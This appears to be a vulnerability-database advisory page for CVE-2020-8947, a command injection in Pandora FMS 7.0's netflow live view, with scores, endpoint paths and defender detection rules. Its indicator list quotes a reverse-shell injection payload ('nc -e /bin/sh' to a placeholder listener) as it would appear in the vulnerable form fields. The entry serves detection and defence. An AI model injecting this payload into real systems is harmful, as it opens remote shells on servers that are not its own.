cbcvebase.
CVE-2020-8947
published 2020-02-12

CVE-2020-8947: functions_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the…

PriorityP264high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
22.48%
97.4th percentile
functions_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the index.php?operation/netflow/nf_live_view ip_dst, dst_port, or src_port parameter, a different vulnerability than CVE-2019-20224.

Affected

1 ranges
VendorProductVersion rangeFixed in
articapandora_fms

Detection & IOCsextracted from sources · hover to see the quote

url/pandora_console/index.php?login=1
url/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0
pathfunctions_netflow.php
command";nc -e /bin/sh <listenerIP> <listenerPort> #
  • Detect POST requests to the netflow live view endpoint with shell metacharacters (e.g., double-quote, semicolon) in the ip_dst, ip_src, dst_port, or src_port POST body parameters.
  • Alert on POST requests to /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view containing nc -e /bin/sh or similar reverse-shell payloads in form fields.
  • Monitor for the exploit's characteristic User-Agent string 'Mozilla/5.0 Gecko/20100101 Firefox/72.0' combined with POST requests to the Pandora FMS netflow endpoint, as this is hardcoded in the public exploit.
  • The exploit requires prior authentication; correlate a successful login POST to /pandora_console/index.php?login=1 immediately followed by a POST to the nf_live_view endpoint from the same session/IP.
  • Payload position may vary across ip_src, dst_port, or src_port fields in addition to ip_dst; inspect all four POST parameters for shell metacharacters.
  • ·Exploitation requires valid credentials; unauthenticated attackers cannot reach the vulnerable code path directly.
  • ·This is a distinct vulnerability from CVE-2019-20224 despite affecting the same netflow functionality; ensure detections cover both CVEs independently.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.